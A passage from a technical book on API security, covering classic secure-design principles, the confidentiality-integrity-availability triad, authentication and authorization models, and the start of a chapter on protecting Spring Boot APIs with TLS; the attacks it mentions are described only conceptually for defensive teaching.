is, the minimum requirement for their functional role only when needed. It further identifies the concept of “zero access” to start, which suggests that no access or virtually no access is the default, so that all subsequent access and the ultimate accumulation can be traced back through an approval process.25 Fail-Safe Defaults The fail-safe defaults principle highlights the importance of making a system safe by default. A user’s default access level to any resource in the system should be “denied” unless they’ve been granted a “permit” explicitly. A fail-safe design will not endanger the 24 Snowden Used Low-Cost Tool to Best NSA, www.nytimes.com/2014/02/09/us/snowden-used- low-cost-tool-to-best-nsa.html 25 Implementing Least Privilege at Your Enterprise, www.sans.org/reading-room/whitepapers/ bestprac/implementing-privilege-enterprise-1188 Chapter 2 Designing seCurity for apis 47 system when it fails. The Java Security Manager implementation follows this principle— once engaged, none of the components in the system can perform any privileged operations unless explicitly permitted. Firewall rules are another example. Data packets are only allowed through a firewall when it’s explicitly allowed; otherwise everything is denied by default. Any complex system will have failure modes. Failures are unavoidable and should be planned for, to make sure that no security risks get immerged as part of a system failure. Possibility of failures is an assumption made under the security design philosophy, defense in depth. If no failures are expected, there is no point of having multiple layers of defense. Let’s go through an example where every one of us is most probably familiar with: credit card verification. When you swipe your credit card at a retail store, the credit card machine there connects to the corresponding credit card service to verify the card details. The credit card verification service will verify the transaction after considering the available amount in the card, whether the card is reported as lost or blacklisted, and other context-sensitive information like the location where the transaction is initiated from, the time of the day, and many other factors. If the credit card machine fails to connect to the verification service, what would happen? In such case, the merchants are given a machine to get an imprint of your card manually. Getting an imprint of the card is not just sufficient, as it does not do any verification. The merchant also has to talk to his bank over the phone, authenticate by providing the merchant number, and then get the transaction verified. That’s the fail-safe process for credit card verification, as the failure of the credit card transaction machine does not lead into any security risks. In case the merchant’s phone line is also completely down, then according to the fail-safe defaults principle, the merchant should avoid accepting any credit card payments. The failure to adhere to fail-safe defaults has resulted in many TLS (Transport Layer Security)/SSL (Secure Sockets Layer) vulnerabilities. Most of the TLS/SSL vulnerabilities are based on the TLS/SSL downgrade attack, where the attacker makes the server to use a cryptographically weak cipher suite (we discuss TLS in depth in Appendix C). In May 2015, a group from INRIA, Microsoft Research, Johns Hopkins, the University of Michigan, and the University of Pennsylvania published a deep analysis26 of the Diffie- Hellman algorithm as used in TLS and other protocols. This analysis included a novel downgrade attack against the TLS protocol itself called Logjam, which exploits export cryptography. Export ciphers are weaker ciphers that were intentionally designed to be 26 Imperfect Forward Secrecy: How Diffie-Hellman Fails in Practice, https://weakdh.org/ imperfect-forward-secrecy-ccs15.pdf Chapter 2 Designing seCurity for apis 48 weaker to meet certain legal requirements enforced by the US government, in 1990s. Only weaker ciphers were legally possible to export into other countries outside the United States. Even though this legal requirement was lifted later on, most of the popular application servers still support export ciphers. The Logjam attack exploited the servers having support for export ciphers by altering the TLS handshake and forcing the servers to use a weaker cipher suite, which can be broken later on. According to the fail-safe defaults principle, in this scenario, the server should abort the TLS handshake when they see a cryptographically weaker algorithm is suggested by the client, rather than accepting and proceeding with it. Economy of Mechanism The economy of mechanism principle highlights the value of simplicity. The design should be as simple as possible. All the component interfaces and the interactions between them should be simple enough to understand. If the design and the implementation were simple, the possibility of bugs would be low, and at the same time, the effort on testing would be less. A simple and easy-to-understand design and implementation would also make it easy to modify and maintain, without introducing bugs exponentially. As discussed earlier in this chapter, Gary McGraw in his book, Software Security, highlights complexity in both the code and the system design as one attribute that is responsible for the high rate of data breaches. The keep it simple, stupid (KISS) principle introduced by the US Navy in 1960 is quite close to what Jerome Saltzer and Michael Schroeder explained under the economy of mechanism principle. It states that most systems work best if they are kept simple rather than made complicated.27 In practice, even though we want to adhere to the KISS principle, from operating systems to application code, everything is becoming more and more complex. Microsoft Windows 3.1 in 1990 started with a codebase slightly over 3 million lines of code. Over time, requirements got complex, and in 2001 Windows XP codebase crossed 40 million lines of code. As we discussed before in this chapter, at the time of this writing, the complete Google codebase to run all its Internet services was around 2 billion lines of code. Even though one can easily argue the increased number of lines of code will not directly reflect the code complexity, in most of the cases, sadly it’s the case. 27 KISS principle, https://en.wikipedia.org/wiki/KISS_principle Chapter 2 Designing seCurity for apis 49 Complete Mediation With complete mediation principle, a system should validate access rights to all its resources to ensure whether they’re allowed to access or not. Most systems do access validation once at the entry point to build a cached permission matrix. Each subsequent operation will be validated against the cached permission matrix. This pattern is mostly followed to address performance concerns by reducing the time spent on policy evaluation, but could quite easily invite attackers to exploit the system. In practice, most systems cache user permissions and roles, but employ a mechanism to clear the cache in an event of a permission or role update. Let’s have a look at an example. When a process running under the UNIX operating system tries to read a file, the operating system itself determines whether the process has the appropriate rights to read the file. If that is the case, the process receives a file descriptor encoded with the allowed level of access. Each time the process reads the file, it presents the file descriptor to the kernel. The kernel examines the file descriptor and then allows the access. In case the owner of the file revokes the read permission from the process after the file descriptor is issued, the kernel still allows access, violating the principle of complete mediation. According to the principle of complete mediation, any permission update should immediately reflect in the application runtime (if cached, then in the cache). Open Design The open design principle highlights the importance of building a system in an open manner—with no secrets, confidential algorithms. This is the opposite of security by obscurity, discussed earlier in the section “Design Challenges.” Most of the strong cryptographic algorithms in use today are designed and implemented openly. One good example is the AES (Advanced Encryption Standard) symmetric key algorithm. NIST (National Institute of Standards and Technology, United States) followed an open process, which expanded from 1997 to 2000 to pick the best cryptographically strong algorithm for AES, to replace DES (Data Encryption Standard), which by then was susceptible to brute-force attacks. On January 2, 1997, the initial announcement was made by NIST regarding the competition to build an algorithm to replace DES. During the first nine months, after the competition began, there were 15 different proposals from several countries. All the designs were open, and each one of them was subjected to thorough cryptanalysis. NIST also held two open conferences to discuss the proposals, Chapter 2 Designing seCurity for apis 50 in August 1998 and March 1999, and then narrowed down all 15 proposals into 5. After another round of intense analysis during the April 2000 AES conference, the winner was announced in October 2000, and they picked Rijndael as the AES algorithm. More than the final outcome, everyone (even the losers of the competition) appreciated NIST for the open process they carried throughout the AES selection phase. The open design principle further highlights that the architects or developers of a particular application should not rely on the design or coding secrets of the application to make it secure. If you rely on open source software, then this is not even possible at all. There are no secrets in open source development. Under the open source philosophy from the design decisions to feature development, all happens openly. One can easily argue, due to the exact same reason, open source software is bad in security. This is a very popular argument against open source software, but facts prove otherwise. According to a report28 by Netcraft published in January 2015, almost 51% of all active sites in the Internet are hosted on web servers powered by the open source Apache web server. The OpenSSL library, which is another open source project implementing the SSL (Secure Sockets Layer) and TLS (Transport Layer Security) protocols, is used by more than 5.5 million web sites in the Internet, by November 2015.29 If anyone seriously worries about the security aspects of open source, it’s highly recommended for him or her to read the white paper published by SANS Institute, under the topic Security Concerns in Using Open Source Software for Enterprise Requirements.30 Note gartner predicts, by 2020, 98% of it organizations will leverage open source software technology in their mission-critical it portfolios, including many cases where they will be unaware of it.31 28 Netcraft January 2015 Web Server Survey, http://news.netcraft.com/archives/2015/01/15/ january-2015-web-server-survey.html 29 OpenSSL Usage Statistics, http://trends.builtwith.com/Server/OpenSSL 30 Security Concerns in Using Open Source Software for Enterprise Requirements, www.sans.org/ reading-room/whitepapers/awareness/security-concerns-open-source-software- enterprise-requirements-1305 31 Middleware Technologies—Enabling Digital Business, www.gartner.com/doc/3163926/ hightech-tuesday-webinar-middleware-technologies Chapter 2 Designing seCurity for apis 51 Separation of Privilege The principle of separation of privilege states that a system should not grant permissions based on a single condition. The same principle is also known as segregation of duties, and one can look into it from multiple aspects. For example, say a reimbursement claim can be submitted by any employee but can only be approved by the manager. What if the manager wants to submit a reimbursement? According to the principle of separation of privilege, the manager should not be granted the right to approve his or her own reimbursement claims. It is interesting to see how Amazon follows the separation of privilege principle in securing AWS (Amazon Web Services) infrastructure. According to the security white paper32 published by Amazon, the AWS production network is segregated from the Amazon Corporate network by means of a complex set of network security/segregation devices. AWS developers and administrators on the corporate network who need to access AWS cloud components in order to maintain them must explicitly request access through the AWS ticketing system. All requests are reviewed and approved by the applicable service owner. Approved AWS personnel then connect to the AWS network through a bastion host that restricts access to network devices and other cloud components, logging all activity for security review. Access to bastion hosts require SSH public key authentication for all user accounts on the host. NSA (National Security Agency, United States) too follows a similar strategy. In a fact sheet33 published by NSA, it highlights the importance of implementing the separation of privilege principle at the network level. Networks are composed of interconnected devices with varying functions, purposes, and sensitivity levels. Networks can consist of multiple segments that may include web servers, database servers, development environments, and the infrastructure that binds them together. Because these segments have different purposes as well as different security concerns, segregating them appropriately is paramount in securing a network from exploitation and malicious intent. 32 AWS security white paper, https://d0.awsstatic.com/whitepapers/aws-security- whitepaper.pdf 33 Segregating networks and functions, www.nsa.gov/ia/_files/factsheets/I43V_Slick_ Sheets/Slicksheet_SegregatingNetworksAndFunctions_Web.pdf Chapter 2 Designing seCurity for apis 52 Least Common Mechanism The principle of least common mechanism concerns the risk of sharing state information among different components. In other words, it says that mechanisms used to access resources should not be shared. This principle can be interpreted in multiple angles. One good example is to see how Amazon Web Services (AWS) works as an infrastructure as a service (IaaS) provider. Elastic Compute Cloud, or EC2, is one of the key services provided by AWS. Netflix, Reddit, Newsweek, and many other companies run their services on EC2. EC2 provides a cloud environment to spin up and down server instances of your choice based on the load you get. With this approach, you do not need to plan before for the highest expected load and let the resources idle most of the time when there is low load. Even though in this case, each EC2 user gets his own isolated server instance running its own guest operating system (Linux, Windows, etc.), ultimately all the servers are running on top of a shared platform maintained by AWS. This shared platform includes a networking infrastructure, a hardware infrastructure, and storage. On top of the infrastructure, there runs a special software called hypervisor. All the guest operating systems are running on top of the hypervisor. Hypervisor provides a virtualized environment over the hardware infrastructure. Xen and KVM are two popular hypervisors, and AWS is using Xen internally. Even though a given virtual server instance running for one customer does not have access to another virtual server instance running for another customer, if someone can find a security hole in the hypervisor, then he can get the control of all the virtual server instances running on EC2. Even though this sounds like nearly impossible, in the past there were many security vulnerabilities reported against the Xen hypervisor.34 The principle of least common mechanism encourages minimizing common, shared usage of resources. Even though the usage of common infrastructure cannot be completely eliminated, its usage can be minimized based on business requirements. AWS Virtual Private Cloud (VPC) provides a logically isolated infrastructure for each of its users. Optionally, one can also select to launch dedicated instances, which run on hardware dedicated to each customer for additional isolation. The principle of least common mechanism can also be applied to a scenario where you store and manage data in a shared multitenanted environment. If we follow the strategy shared everything, then the data from different customers can be stored in 34 Xen Security Advisories, http://xenbits.xen.org/xsa/ Chapter 2 Designing seCurity for apis 53 the same table of the same database, isolating each customer data by the customer id. The application, which accesses the database, will make sure that a given customer can only access his own data. With this approach, if someone finds a security hole in the application logic, he can access all customer data. The other approach could be to have an isolated database for each customer. This is a more expensive but much secure option. With this we can minimize what is being shared between customers. Psychological Acceptability The principle of psychological acceptability states that security mechanisms should not make the resource more difficult to access than if the security mechanisms were not present. Accessibility to resources should not be made difficult by security mechanisms. If security mechanisms kill the usability or accessibility of resources, then users may find ways to turn off those mechanisms. Wherever possible, security mechanisms should be transparent to the users of the system or at most introduce minimal distractions. Security mechanisms should be user-friendly to encourage the users to occupy them more frequently. Microsoft introduced information cards in 2005 as a new paradigm for authentication to fight against phishing. But the user experience was bad, with a high setup cost, for people who were used to username/password-based authentication. It went down in history as another unsuccessful initiative from Microsoft. Most of the web sites out there use CAPTCHA as a way to differentiate human beings from automated scripts. CAPTCHA is in fact an acronym, which stands for Completely Automated Public Turing test to tell Computers and Humans Apart. CAPTCHA is based on a challenge-response model and mostly used along with user registration and password recovery functions to avoid any automated brute-force attacks. Even though this tightens up security, this also could easily kill the user experience. Some of the challenges provided by certain CAPTCHA implementations are not even readable to humans. Google tries to address this concern with Google reCAPTCHA.35 With reCAPTCHA users can attest they are humans without having to solve a CAPTCHA. Instead, with just a single click, one can confirm that he is not a robot. This is also known as No CAPTCHA reCAPTCHA experience. 35 Google reCAPTCHA, www.google.com/recaptcha/intro/index.html Chapter 2 Designing seCurity for apis 54 Security Triad Confidentiality, integrity, and availability (CIA), widely known as the triad of information security, are three key factors used in benchmarking information systems security. This is also known as CIA triad or AIC triad. The CIA triad helps in both designing a security model and assessing the strength of an existing security model. In the following sections, we discuss the three key attributes of the CIA triad in detail. Confidentiality Confidentiality attribute of the CIA triad worries about how to protect data from unintended recipients, both at rest and in transit. You achieve confidentiality by protecting transport channels and storage with encryption. For APIs, where the transport channel is HTTP (most of the time), you can use Transport Layer Security (TLS), which is in fact known as HTTPS. For storage, you can use disk-level encryption or application- level encryption. Channel encryption or transport-level encryption only protects a message while it’s in transit. As soon as the message leaves the transport channel, it’s no more secure. In other words, transport-level encryption only provides point-to-point protection and truncates from where the connection ends. In contrast, there is message- level encryption, which happens at the application level and has no dependency on the transport channel. In other words, with message-level encryption, the application itself has to worry about how to encrypt the message, prior to sending it over the wire, and it’s also known as end-to-end encryption. If you secure data with message-level encryption, then you can use even an insecure channel (like HTTP) to transport the message. A TLS connection, when going through a proxy, from the client to the server can be established in two ways: either with TLS bridging or with TLS tunneling. Almost all proxy servers support both modes. For a highly secured deployment, TLS tunneling is recommended. In TLS bridging, the initial connection truncates from the proxy server, and a new connection to the gateway (or the server) is established from there. That means the data is in cleartext while inside the proxy server. Any intruder who can plant malware in the proxy server can intercept traffic that passes through. With TLS tunneling, the proxy server facilitates creating a direct channel between the client machine and the gateway (or the server). The data flow through this channel is invisible to the proxy server. Message-level encryption, on the other hand, is independent from the underlying transport. It’s the application developers’ responsibility to encrypt and decrypt messages. Because this is application specific, it hurts interoperability and builds tight Chapter 2 Designing seCurity for apis 55 couplings between the sender and the receiver. Each has to know how to encrypt/ decrypt data beforehand—which will not scale well in a largely distributed system. To overcome this challenge, there have been some concentrated efforts to build standards around message-level security. XML Encryption is one such effort, led by the W3C. It standardizes how to encrypt an XML payload. Similarly, the IETF JavaScript Object Signing and Encryption (JOSE) working group has built a set of standards for JSON payloads. In Chapters 7 and 8, we discuss JSON Web Signature and JSON Web Encryption, respectively—which are two prominent standards in securing JSON messages. Note secure sockets Layer (ssL) and transport Layer security (tLs) are often used interchangeably, but in pure technical terms, they aren’t the same. tLs is the successor of ssL 3.0. tLs 1.0, which is defined under the ietf rfC 2246, is based on the ssL 3.0 protocol specification, which was published by netscape. the differences between tLs 1.0 and ssL 3.0 aren’t dramatic, but they’re significant enough that tLs 1.0 and ssL 3.0 don’t interoperate. There are few more key differences between transport-level security and message- level security, in addition to what were discussed before. • Transport-level security being point to point, it encrypts the entire message while in transit. • Since transport-level relies on the underlying channel for protection, application developers have no control over which part of the data to encrypt and which part not to. • Partial encryption isn’t supported by transport-level security, but it is supported by message-level security. • Performance is a key factor, which differentiates message-level security from transport-level security. Message-level encryption is far more expensive than transport-level encryption, in terms of resource consumption. Chapter 2 Designing seCurity for apis 56 • Message-level encryption happens at the application layer, and it has to take into consideration the type and the structure of the message to carry out the encryption process. If it’s an XML message, then the process defined in the XML Encryption standard has to be followed. Integrity Integrity is a guarantee of data’s correctness and trustworthiness and the ability to detect any unauthorized modifications. It ensures that data is protected from unauthorized or unintentional alteration, modification, or deletion. The way to achieve integrity is twofold: preventive measures and detective measures. Both measures have to take care of data in transit as well as data at rest. To prevent data from alteration while in transit, you should use a secure channel that only intended parties can read or do message-level encryption. TLS (Transport Layer Security) is the recommended approach for transport-level encryption. TLS itself has a way of detecting data modifications. It sends a message authentication code in each message from the first handshake, which can be verified by the receiving party to make sure the data has not been modified while in transit. If you use message-level encryption to prevent data alteration, then to detect any modification in the message at the recipient, the sender has to sign the message, and with the public key of the sender, the recipient can verify the signature. Similar to what we discussed in the previous section, there are standards based on the message type and the structure, which define the process of signing. If it’s an XML message, then the XML Signature standard by W3C defines the process. For data at rest, you can calculate the message digest periodically and keep it in a secured place. The audit logs, which can be altered by an intruder to hide suspicious activities, need to be protected for integrity. Also with the advent of network storage and new technology trends, which have resulted in new failure modes for storage, interesting challenges arise in ensuring data integrity. A paper36 published by Gopalan Sivathanu, Charles P. Wright, and Erez Zadok of Stony Brook University highlights the causes of integrity violations in storage and presents a survey of integrity assurance techniques that exist today. It describes several interesting applications of storage integrity checking, apart from security, and discusses the implementation issues associated with those techniques. 36 Ensuring Data Integrity in Storage: Techniques and Applications, www.fsl.cs.sunysb.edu/ docs/integrity-storagess05/integrity.html Chapter 2 Designing seCurity for apis 57 Note http Digest authentication with the quality of protection (qop) value set to auth-int can be used to protect messages for integrity. appendix f discusses http Digest authentication in depth. Availability Making a system available for legitimate users to access all the time is the ultimate goal of any system design. Security isn’t the only aspect to look into, but it plays a major role in keeping the system up and running. The goal of the security design should be to make the system highly available by protecting it from illegal access attempts. Doing so is extremely challenging. Attacks, especially on a public API, can vary from an attacker planting malware in the system to a highly organized distributed denial of service (DDoS) attack. DDoS attacks are hard to eliminate fully, but with a careful design, they can be minimized to reduce their impact. In most cases, DDoS attacks must be detected at the network perimeter level—so, the application code doesn’t need to worry too much. But vulnerabilities in the application code can be exploited to bring a system down. A paper37 published by Christian Mainka, Juraj Somorovsky, Jorg Schwenk, and Andreas Falkenberg discusses eight types of DoS attacks that can be carried out against SOAP- based APIs with XML payloads: • Coercive parsing attack: The attacker sends an XML document with a deeply nested XML structure. When a DOM-based parser processes the XML document, an out-of-memory exception or a high CPU load can occur. • SOAP array attack: Forces the attacked web service to declare a very large SOAP array. This can exhaust the web service’s memory. • XML element count attack: Attacks the server by sending a SOAP message with a high number of non-nested elements. 37 A New Approach towards DoS Penetration Testing on Web Services, www.nds.rub.de/media/ nds/veroeffentlichungen/2013/07/19/ICWS_DoS.pdf Chapter 2 Designing seCurity for apis 58 • XML attribute count attack: Attacks the server by sending a SOAP message with a high attribute count. • XML entity expansion attack: Causes a system failure by forcing the server to recursively resolve entities defined in a document type definition (DTD). This attack is also known as an XML bomb or a billion laughs attack. • XML external entity DoS attack: Causes a system failure by forcing the server to resolve a large external entity defined in a DTD. If an attacker is able to execute the external entity attack, an additional attack surface may appear. • XML overlong name attack: Injects overlong XML nodes in the XML document. Overlong nodes can be overlong element names, attribute names, attribute values, or namespace definitions. • Hash collision attack (HashDoS): Different keys result in the same bucket assignments, causing a collision. A collision leads to resource- intensive computations in the bucket. When a weak hash function is used, an attacker can intentionally create hash collisions that lead to a system failure. Most of these attacks can be prevented at the application level. For CPU- or memory- intensive operations, you can keep threshold values. For example, to prevent a coercive parsing attack, the XML parser can enforce a limit on the number of elements. Similarly, if your application executes a thread for a longer time, you can set a threshold and kill it. Aborting any further processing of a message as soon as it’s found to be not legitimate is the best way to fight against DoS attacks. This also highlights the importance of having authentication/authorization checks closest to the entry point of the flow. Note according to esecurity planet, one of the largest DDos attacks hit the internet in March 2013 and targeted the Cloudflare network with 120 gbps. the upstream providers were hit by 300 gbps DDos at the peak of the attack. Chapter 2 Designing seCurity for apis 59 There are also DoS attacks carried out against JSON vulnerabilities. CVE-2013-026938 explains a scenario in which a carefully crafted JSON message can be used to trigger the creation of arbitrary Ruby symbols or certain internal objects, to result in a DoS attack. Security Control The CIA triad (confidentiality, integrity, and availability), which we discussed in detail in the previous section of this chapter, is one of the core principles of information security. In achieving CIA, authentication, authorization, nonrepudiation, and auditing are four prominent controls, which play a vital role. In the following sections, we discuss these four security controls in detail. Authentication Authentication is the process of identifying a user, a system, or a thing in a unique manner to prove that it is the one who it claims to be. Authentication can be direct or brokered, based on how you bring your authentication assertions. If you directly log in to a system just providing your username and password, it falls under direct authentication. In other words, under direct authentication, the entity which wants to authenticate itself presents the authentication assertions to the service it wants to access. Under brokered authentication, there is a third party involved. This third party is commonly known as an identity provider. When you log in to your Yelp account via Facebook, it falls under brokered authentication, and Facebook is the identity provider. With brokered authentication, the service provider (or the website you want to log in, or the API you want to access) does not trust you directly. It only trusts an identity provider. You can access the service only if the trusted identity provider (by the service provider) passes a positive assertion to the service provider. Authentication can be done in a single factor or in multiple factors (also known as multifactor authentication). Something you know, something you are, and something you have are the well-known three factors of authentication. For multifactor authentication, a system should use a combination of at least two factors. Combining two techniques 38 CVE-2013-0269, https://nvd.nist.gov/vuln/detail/CVE-2013-0269 Chapter 2 Designing seCurity for apis 60 that fall under the same category isn’t considered multifactor authentication. For example, entering a username and a password and then a PIN number isn’t considered multifactor authentication, because both fall under the something you know category. Note google two-step verification falls under multifactor authentication. first you need to provide a username and a password (something you know), and then a pin is sent to your mobile phone. Knowing the pin verifies that the registered mobile phone is under your possession: it’s something you have. then again one can argue this is not multifactor authentication, because you only need to know the pin, having the phone with you to get the pin is not mandatory. this sounds bit weird, but grant Blakeman’s incident proved exactly the same thing.39 an attacker was able to set a call forwarding number into grant’s cell phone and was able to receive google password reset information to the new number (via call forwarding). Something You Know Passwords, passphrases, and PIN numbers belong to the category of something you know. This has been the most popular form of authentication not just for decades but also for centuries. It goes back to the eighteenth century. In the Arabian folktale Ali Baba and the Forty Thieves from One Thousand and One Nights, Ali Baba uses the passphrase “open sesame” to open the door to a hidden cave. Since then, this has become the most popular form of authentication. Unfortunately, it’s also the weakest form of authentication. Password-protected systems can be broken in several ways. Going back to Ali Baba’s story, his brother-in-law got stuck in the same cave without knowing the password and tried shouting all the words he knew. This, in modern days, is known as a brute-force attack. The first known brute-force attack took place in the 18th century. Since then, it has become a popular way of breaking password-secured systems. 39 The value of a name, https://ello.co/gb/post/knOWk-qeTqfSpJ6f8-arCQ Chapter 2 Designing seCurity for apis 61 Note in april 2013, Wordpress was hit with a brute-force attack of massive scale. the average scans per day in april were more than 100,000.40 there are different forms of brute-force attacks. the dictionary attack is one of them, where the brute-force attack is carried out with a limited set of inputs based on a dictionary of commonly used words. this is why you should have a corporate password policy that should enforce strong passwords with mixed alphanumeric characters that aren’t found in dictionaries. Most public web sites enforce a CaptCha after few failed login attempts. this makes automated/tool-based brute-force attacks harder to execute. Something You Have Certificates and smart card–based authentication fall into the category of something you have. This is a much stronger form of authentication than something you know. TLS mutual authentication is the most popular way of securing APIs with client certificates; this is covered in detail in Chapter 3. FIDO (Fast IDentity Online) authentication also falls under the something you have category. FIDO alliance41 has published three open specifications to address certain concerns in strong authentication: FIDO Universal Second Factor (FIDO U2F), FIDO Universal Authentication Framework (FIDO UAF) and the Client to Authenticator Protocol (CTAP). FIDO U2F protocol allows online services to augment the security of their existing password infrastructure by adding a strong second factor to user login. The largest deployment of FIDO U2F–based authentication is at Google. Google has been using FIDO U2F internally for some time to secure its internal services, and in October 2014 Google made FIDO U2F enabled to all its users publicly.42 40 The WordPress Brute Force Attack Timeline, http://blog.sucuri.net/2013/04/the- wordpress-brute-force-attack-timeline.html 41 FIDO Alliance, https://fidoalliance.org/specifications/overview/ 42 Strengthening 2-Step Verification with Security Key, https://googleonlinesecurity. blogspot.com/2014/10/strengthening-2-step-verification-with.html Chapter 2 Designing seCurity for apis 62 Something You Are Fingerprints, eye retina, facial recognition, and all other biometric-based authentication techniques fall into the category of something you are. This is the strongest form of authentication. In most of the cases, biometric authentication is not done on its own, rather used with another factor to further improve the security. With the wide adoption of mobile devices, most of the retailers, financial institutes, and many others have chosen fingerprint-based authentication for their mobile apps. In the iOS platform, all these applications associate their username- and password-based authentication with Apple Touch ID (or face recognition). Once the initial association is done, a user can log in to all the associated applications just by scanning his fingerprint. Further iPhone also associates Touch ID with App Store login and to authorize Apple Pay transactions. Authorization Authorization is the process of validating what actions an authenticated user, a system, or a thing can perform within a well-defined system boundary. Authorization happens with the assumption that the user is already authenticated. Discretionary Access Control (DAC) and Mandatory Access Control (MAC) are two prominent models to control access in a system. With Discretionary Access Control (DAC), the user who owns the data, at their discretion, can transfer rights to another user. Most operating systems support DAC, including Unix, Linux, and Windows. When you create a file in Linux, you can decide who should be able to read, write to, and execute it. Nothing prevents you from sharing it with any user or a group of users. There is no centralized control—which can easily bring security flaws into the system. With Mandatory Access Control (MAC), only designated users are allowed to grant rights. Once rights are granted, users can’t transfer them. SELinux, Trusted Solaris, and TrustedBSD are some of the operating systems that support MAC. Chapter 2 Designing seCurity for apis 63 Note seLinux is an nsa research project that added the Mandatory access Control (MaC) architecture to the Linux kernel, which was then merged into the mainstream version of Linux in august 2003. it utilizes a Linux 2.6 kernel feature called the Linux security Modules (LsM) interface. The difference between DAC and MAC lies in who owns the right to delegate. In either case, you need to have a way to represent access control rules or the access matrix. Authorization tables, access control lists (see Figure 2-2), and capabilities are three ways of representing access control rules. An authorization table is a three-column table with subject, action, and resource. The subject can be an individual user or a group. With access control lists, each resource is associated with a list, indicating, for each subject, the actions that the subject can exercise on the resource. With capabilities, each subject has an associated list called a capability list, indicating, for each resource, the actions that the user is allowed to exercise on the resource. A bank locker key can be considered a capability: the locker is the resource, and the user holds the key to the resource. At the time the user tries to open the locker with the key, you only have to worry about the capabilities of the key—not the capabilities of its owner. An access control list is resource driven, whereas capabilities are subject driven. Authorization tables, access control lists and capabilities are very coarse grained. One alternative is to use policy-based access control. With policy-based access control, you can have authorization policies with fine granularity. In addition, capabilities and access control lists can be dynamically derived from policies. eXtensible Access Control Markup Language (XACML) is one of the OASIS standards for policy-based access control. Figure 2-2. Access control list Chapter 2 Designing seCurity for apis 64 Note XaCML is an XML-based open standard for policy-based access control developed under the oasis XaCML technical Committee. XaCML 3.0, the latest XaCML specification, was standardized in January 2013.43 then again XaCML is little too complex in defining access control policies, irrespective of how powerful it is. you can also check the open policy agent (opa) project, which has become quite popular recently in building fine-grained access control policies. Nonrepudiation Whenever you do a business transaction via an API by proving your identity, later you should not be able to reject it or repudiate it. The property that ensures the inability to repudiate is known as nonrepudiation. You do it once—you own it forever. Nonrepudiation should provide proof of the origin and the integrity of data, both in an unforgeable manner, which a third party can verify at any time. Once a transaction is initiated, none of its content—including the user identity, date and time, and transaction details—should be altered to maintain the transaction integrity and allow future verifications. One has to ensure that the transaction is unaltered and logged after it’s committed and confirmed. Logs must be archived and properly secured to prevent unauthorized modifications. Whenever there is a repudiation dispute, transaction logs along with other logs or data can be retrieved to verify the initiator, date and time, transaction history, and so on. Note tLs ensures authentication (by verifying the certificates), confidentiality (by encrypting the data with a secret key), and integrity (by digesting the data), but not nonrepudiation. in tLs, the Message authentication Code (MaC) value of the data transmitted is calculated with a shared secret key, known to both the client and the server. shared keys can’t be used for nonrepudiation. 43 XACML 3.0 specification, http://docs.oasis-open.org/xacml/3.0/xacml-3.0-core-spec- os-en.pdf Chapter 2 Designing seCurity for apis 65 Digital signatures provide a strong binding between the user (who initiates the transaction) and the transaction the user performs. A key known only to the user should sign the complete transaction, and the server (or the service) should be able to verify the signature through a trusted broker that vouches for the legitimacy of the user’s key. This trusted broker can be a certificate authority (CA). Once the signature is verified, the server knows the identity of the user and can guarantee the integrity of the data. For nonrepudiation purposes, the data must be stored securely for any future verification. Note the paper44 Non-Repudiation in Practice, by Chii-ren tsai of Citigroup, discusses two potential nonrepudiation architectures for financial transactions using challenge-response one-time password tokens and digital signatures. Auditing There are two aspects of auditing: keeping track of all legitimate access attempts to facilitate nonrepudiation, and keeping track of all illegal access attempts to identify possible threats. There can be cases where you’re permitted to access a resource, but it should be with a valid purpose. For example, a mobile operator is allowed to access a user’s call history, but he should not do so without a request from the corresponding user. If someone frequently accesses a user’s call history, you can detect it with proper audit trails. Audit trails also play a vital role in fraud detection. An administrator can define fraud-detection patterns, and the audit logs can be evaluated in near real time to find any matches. Summary • Security isn’t an afterthought. It has to be an integral part of any development project and also for APIs. It starts with requirements gathering and proceeds through the design, development, testing, deployment, and monitoring phases. 44 Non-Repudiation in Practice, www.researchgate.net/publication/240926842_ Non-Repudiation_In_Practice Chapter 2 Designing seCurity for apis 66 • Connectivity, extensibility, and complexity are the three trends behind the rise of data breaches around the globe in the last few years. • The most challenging thing in any security design is to find and maintain the right balance between security and the user comfort. • A proper security design should care about all the communication links in the system. Any system is no stronger than its weakest link. • A layered approach is preferred for any system being tightened for security. This is also known as defense in depth. • Insider attacks are less complicated, but highly effective. • Kerckhoffs’ principle emphasizes that a system should be secured by its design, not because the design is unknown to an adversary. • The principle of least privilege states that an entity should only have the required set of permissions to perform the actions for which they are authorized, and no more. • The fail-safe defaults principle highlights the importance of making a system safe by default. • The economy of mechanism principle highlights the value of simplicity. The design should be as simple as possible. • With complete mediation principle, a system should validate access rights to all its resources to ensure whether they’re allowed to access or not. • The open design principle highlights the importance of building a system in an open manner—with no secrets, confidential algorithms. • The principle of separation of privilege states that a system should not grant permissions based on a single condition. • The principle of least common mechanism concerns the risk of sharing state information among different components. Chapter 2 Designing seCurity for apis 67 • The principle of psychological acceptability states that security mechanisms should not make the resource more difficult to access than if the security mechanisms were not present. • Confidentiality, integrity, and availability (CIA), widely known as the triad of information security, are three key factors used in benchmarking information systems security. Chapter 2 Designing seCurity for apis 69 © Prabath Siriwardena 2020 P. Siriwardena, Advanced API Security, https://doi.org/10.1007/978-1-4842-2050-4_3 CHAPTER 3 Securing APIs with Transport Layer Security (TLS) Securing APIs with Transport Layer Security (TLS) is the most common form of protection we see in any API deployment. If you are new to TLS, please check Appendix C first, which explains TLS in detail and how it works. In securing APIs, we use TLS to secure or encrypt the communication—or protect the data in transit—and also we use TLS mutual authentication to make sure only the legitimate clients can access the APIs. In this chapter, we discuss how to deploy an API implemented in Java Spring Boot, enable TLS, and protect an API with mutual TLS. Setting Up the Environment In this section, we’ll see how we can develop an API using Spring Boot from scratch. Spring Boot (https://projects.spring.io/spring-boot/) is the most popular microservices development framework for Java developers. To be precise, Spring Boot offers an opinionated1 runtime for Spring, which takes out a lot of complexities. Even though Spring Boot is opinionated, it also gives developers to override many of its default picks. Due to the fact that many Java developers are familiar with Spring, and the ease of development is a key success factor in the microservices world, many adopted Spring Boot. Even for Java developers who are not using Spring, still it is a household name. If you have worked on Spring, you surely would have worried how painful it was 1 An opinionated framework locks or guides its developers into its own way of doing things. 70 to deal with large, chunky XML configuration files. Unlike Spring, Spring Boot believes in convention over configuration—no more XML hell! In this book, we use Spring Boot to implement our APIs. Even if you are not familiar with Java, you will be able to get started with no major learning curve, as we provide all the code examples. To run the samples, you will need Java 8 or latest, Maven 3.2 or latest, and a git client. Once you are successfully done with the installation, run the following two commands in the command line to make sure everything is working fine. If you’d like some help in setting up Java or Maven, there are plenty of online resources out there. \>java -version java version 